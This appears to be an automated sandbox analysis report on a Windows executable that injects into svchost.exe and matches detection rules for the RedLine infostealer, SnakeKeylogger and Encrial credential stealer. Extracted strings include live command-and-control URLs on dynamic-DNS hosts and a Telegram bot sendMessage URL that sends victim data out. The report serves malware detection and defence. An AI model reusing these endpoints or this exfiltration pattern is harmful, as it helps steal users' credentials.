              Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
              Source: global trafficDNS traffic detected: DNS query: api.telegram.org
              Source: global trafficDNS traffic detected: DNS query: 241.42.69.40.in-addr.arpa
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 10 Jan 2025 19:33:36 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
              Source: svchost.exe, 00000002.00000003.2062862558.000000000326F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4526377595.0000000003374000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4529350444.0000000007910000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000002.4529908255.0000000007D00000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
              Source: svchost.exe, 00000002.00000003.2062862558.000000000326F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4526377595.0000000003374000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4529350444.0000000007910000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000002.4529908255.0000000007D00000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000002.4526971369.0000000005371000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
              Source: svchost.exe, 00000002.00000003.2062862558.000000000326F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4526377595.0000000003374000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4529350444.0000000007910000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000002.4529908255.0000000007D00000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000002.4526971369.0000000005371000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
              Source: svchost.exe, 00000002.00000002.4526971369.0000000005371000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
              Source: svchost.exe, 00000002.00000003.2175070058.0000000007B2F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4526971369.0000000005371000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
              Source: svchost.exe, 00000002.00000003.2062862558.000000000326F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4526377595.0000000003374000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4529350444.0000000007910000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000002.4529908255.0000000007D00000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
              Source: svchost.exe, 00000002.00000002.4526971369.0000000005371000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: svchost.exe, 00000002.00000003.2062862558.000000000326F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4526377595.0000000003374000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4529350444.0000000007910000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000002.4529908255.0000000007D00000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000002.4526971369.0000000005371000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
              Source: svchost.exe, 00000002.00000002.4528192368.0000000006638000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4528192368.00000000063F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: svchost.exe, 00000002.00000002.4526971369.0000000005456000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
              Source: svchost.exe, 00000002.00000003.2062862558.000000000326F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4526377595.0000000003374000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4529350444.0000000007910000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000002.4526971369.0000000005456000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4529908255.0000000007D00000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
              Source: svchost.exe, 00000002.00000002.4526971369.0000000005456000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
              Source: svchost.exe, 00000002.00000002.4526971369.0000000005456000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:287400%0D%0ADate%20a
              Source: svchost.exe, 00000002.00000002.4528192368.0000000006638000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4528192368.00000000063F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: svchost.exe, 00000002.00000002.4528192368.0000000006638000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4528192368.00000000063F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: svchost.exe, 00000002.00000002.4528192368.0000000006638000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4528192368.00000000063F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: svchost.exe, 00000002.00000002.4526971369.00000000054EA000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4526971369.0000000005479000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
              Source: svchost.exe, 00000002.00000002.4526971369.00000000054DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enhZ
              Source: svchost.exe, 00000002.00000002.4526971369.00000000054EA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enl
              Source: svchost.exe, 00000002.00000002.4526971369.00000000054E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlB
              Source: svchost.exe, 00000002.00000002.4528192368.0000000006638000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4528192368.00000000063F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: svchost.exe, 00000002.00000002.4528192368.0000000006638000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4528192368.00000000063F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: svchost.exe, 00000002.00000002.4528192368.0000000006638000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4528192368.00000000063F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: svchost.exe, 00000002.00000002.4526971369.0000000005456000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4526971369.00000000053BE000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4526971369.000000000542E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
              Source: svchost.exe, 00000002.00000003.2062862558.000000000326F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4526377595.0000000003374000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4529350444.0000000007910000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000002.4529908255.0000000007D00000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000002.4526971369.00000000053BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
              Source: svchost.exe, 00000002.00000002.4526971369.000000000542E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
              Source: svchost.exe, 00000002.00000002.4526971369.00000000053E8000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4526971369.0000000005456000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4526971369.000000000542E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
              Source: svchost.exe, 00000002.00000002.4528192368.0000000006638000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4528192368.00000000063F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: svchost.exe, 00000002.00000002.4528192368.0000000006638000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4528192368.00000000063F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: svchost.exe, 00000002.00000002.4526971369.000000000551B000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4526971369.000000000550C000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4526971369.0000000005479000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
              Source: svchost.exe, 00000002.00000002.4526971369.000000000550C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/hZ
              Source: svchost.exe, 00000002.00000002.4526971369.000000000551B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/l
              Source: svchost.exe, 00000002.00000002.4526971369.0000000005516000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB
              Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
              Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
              Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
              Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
              Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49721 version: TLS 1.2
              Source: C:\Users\user\Desktop\9L83v5j083.exeCode function: 0_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_0045A10F
              Source: C:\Users\user\Desktop\9L83v5j083.exeCode function: 0_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_0045A10F
              Source: C:\Users\user\Desktop\9L83v5j083.exeCode function: 0_2_0046DC80 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,0_2_0046DC80
              Source: C:\Users\user\Desktop\9L83v5j083.exeCode function: 0_2_0044C37A GetKeyboardState,SetKeyboardState,PostMessageW,PostMessageW,SendInput,0_2_0044C37A
              Source: C:\Users\user\Desktop\9L83v5j083.exeCode function: 0_2_0047C81C SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0047C81C

              System Summary

              barindex
              Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 0.2.9L83v5j083.exe.3e40000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 2.2.svchost.exe.7d00000.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 2.2.svchost.exe.7d00000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 2.2.svchost.exe.7d00000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 2.2.svchost.exe.7910f20.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 2.2.svchost.exe.7910f20.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 2.2.svchost.exe.7910f20.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 2.3.svchost.exe.326f000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 2.2.svchost.exe.7910000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 2.2.svchost.exe.7910000.3.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 2.2.svchost.exe.7910000.3.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 2.2.svchost.exe.3374f2e.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 2.2.svchost.exe.3374f2e.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 2.2.svchost.exe.3374f2e.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 2.3.svchost.exe.326f000.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 2.3.svchost.exe.326f000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 2.3.svchost.exe.326ff20.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 2.3.svchost.exe.326ff20.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 2.3.svchost.exe.326ff20.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 2.3.svchost.exe.326ff20.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 2.3.svchost.exe.326ff20.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 2.3.svchost.exe.326ff20.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 2.2.svchost.exe.7d00000.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 2.2.svchost.exe.7d00000.4.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 2.2.svchost.exe.7d00000.4.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 2.2.svchost.exe.3374f2e.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 2.2.svchost.exe.3374f2e.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 2.2.svchost.exe.3374f2e.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 2.3.svchost.exe.326f000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 2.3.svchost.exe.326f000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 2.3.svchost.exe.326f000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 2.2.svchost.exe.7910000.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 2.2.svchost.exe.7910000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 2.2.svchost.exe.7910000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 2.2.svchost.exe.7910f20.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 2.2.svchost.exe.7910f20.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 2.2.svchost.exe.7910f20.2.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 00000002.00000003.2062862558.000000000326F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 00000002.00000003.2062862558.000000000326F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 00000002.00000003.2062862558.000000000326F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 00000002.00000002.4529350444.0000000007910000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 00000002.00000002.4529350444.0000000007910000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 00000002.00000002.4529350444.0000000007910000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 00000002.00000002.4526377595.0000000003374000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 00000000.00000002.2063454139.0000000003E40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 00000002.00000002.4525593506.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 00000002.00000002.4529908255.0000000007D00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 00000002.00000002.4529908255.0000000007D00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 00000002.00000002.4529908255.0000000007D00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: Process Memory Space: svchost.exe PID: 428, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: C:\Users\user\Desktop\9L83v5j083.exeCode function: 0_2_00431BE8: GetFullPathNameW,__swprintf,_wcslen,CreateDirectoryW,CreateFileW,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_00431BE8
              Source: C:\Users\user\Desktop\9L83v5j083.exeCode function: 0_2_00446313 DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,_wcsncpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00446313
              Source: C:\Users\user\Desktop\9L83v5j083.exeCode function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,0_2_004333BE
              Source: C:\Users\user\Desktop\9L83v5j083.exeCode function: 0_2_0042200C0_2_0042200C
              Source: C:\Users\user\Desktop\9L83v5j083.exeCode function: 0_2_0041A2170_2_0041A217
              Source: C:\Users\user\Desktop\9L83v5j083.exeCode function: 0_2_004122160_2_00412216
              Source: C:\Users\user\Desktop\9L83v5j083.exeCode function: 0_2_0042435D0_2_0042435D
              Source: C:\Users\user\Desktop\9L83v5j083.exeCode function: 0_2_004033C00_2_004033C0
              Source: C:\Users\user\Desktop\9L83v5j083.exeCode function: 0_2_0044F4300_2_0044F430
              Source: C:\Users\user\Desktop\9L83v5j083.exeCode function: 0_2_004125E80_2_004125E8
              Source: C:\Users\user\Desktop\9L83v5j083.exeCode function: 0_2_0044663B0_2_0044663B
              Source: C:\Users\user\Desktop\9L83v5j083.exeCode function: 0_2_004096A00_2_004096A0
              Source: C:\Users\user\Desktop\9L83v5j083.exeCode function: 0_2_004138010_2_00413801
              Source: C:\Users\user\Desktop\9L83v5j083.exeCode function: 0_2_0042096F0_2_0042096F
              Source: C:\Users\user\Desktop\9L83v5j083.exeCode function: 0_2_004129D00_2_004129D0
              Source: C:\Users\user\Desktop\9L83v5j083.exeCode function: 0_2_004119E30_2_004119E3
              Source: C:\Users\user\Desktop\9L83v5j083.exeCode function: 0_2_0041C9AE0_2_0041C9AE
              Source: C:\Users\user\Desktop\9L83v5j083.exeCode function: 0_2_0047EA6F0_2_0047EA6F
              Source: C:\Users\user\Desktop\9L83v5j083.exeCode function: 0_2_0040FA100_2_0040FA10
              Source: C:\Users\user\Desktop\9L83v5j083.exeCode function: 0_2_0044EB590_2_0044EB59
              Source: C:\Users\user\Desktop\9L83v5j083.exeCode function: 0_2_00423C810_2_00423C81
              Source: C:\Users\user\Desktop\9L83v5j083.exeCode function: 0_2_00411E780_2_00411E78
              Source: C:\Users\user\Desktop\9L83v5j083.exeCode function: 0_2_00442E0C0_2_00442E0C
              Source: C:\Users\user\Desktop\9L83v5j083.exeCode function: 0_2_00420EC00_2_00420EC0
              Source: C:\Users\user\Desktop\9L83v5j083.exeCode function: 0_2_0044CF170_2_0044CF17
              Source: C:\Users\user\Desktop\9L83v5j083.exeCode function: 0_2_00444FD20_2_00444FD2
              Source: C:\Users\user\Desktop\9L83v5j083.exeCode function: 0_2_02E435F00_2_02E435F0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00408C602_2_00408C60
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040DC112_2_0040DC11
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00407C3F2_2_00407C3F
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00418CCC2_2_00418CCC
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00406CA02_2_00406CA0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004028B02_2_004028B0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041A4BE2_2_0041A4BE
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004182442_2_00418244
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004016502_2_00401650
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402F202_2_00402F20
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004193C42_2_004193C4
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004187882_2_00418788
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402F892_2_00402F89
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402B902_2_00402B90
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004073A02_2_004073A0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0789D7B82_2_0789D7B8
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0789A5982_2_0789A598
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0789D4EA2_2_0789D4EA
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_078974E02_2_078974E0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0789C4E02_2_0789C4E0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0789D20A2_2_0789D20A
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0789CF302_2_0789CF30
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_07896EA82_2_07896EA8
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0789EEE02_2_0789EEE0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_07892EF82_2_07892EF8
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0789CC582_2_0789CC58
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0789C9802_2_0789C980
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0789586F2_2_0789586F
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0789C6A82_2_0789C6A8
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_078943112_2_07894311
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0789EED02_2_0789EED0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0789FBA82_2_0789FBA8
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_090795782_2_09079578
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_090725802_2_09072580
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_090750482_2_09075048
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_09079C482_2_09079C48
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0907CCD02_2_0907CCD0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_09070B302_2_09070B30
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_090717B02_2_090717B0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_09071E982_2_09071E98
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0907D1192_2_0907D119
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0907D1282_2_0907D128
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0907D5702_2_0907D570
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0907257A2_2_0907257A
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0907D5802_2_0907D580
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0907D9C82_2_0907D9C8
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0907D9D82_2_0907D9D8
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_090700062_2_09070006
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0907F8322_2_0907F832
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_090750382_2_09075038
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_090700402_2_09070040
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0907F8402_2_0907F840
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0907FC982_2_0907FC98
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0907CCC02_2_0907CCC0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_09070B202_2_09070B20
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0907EB292_2_0907EB29
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0907EB382_2_0907EB38
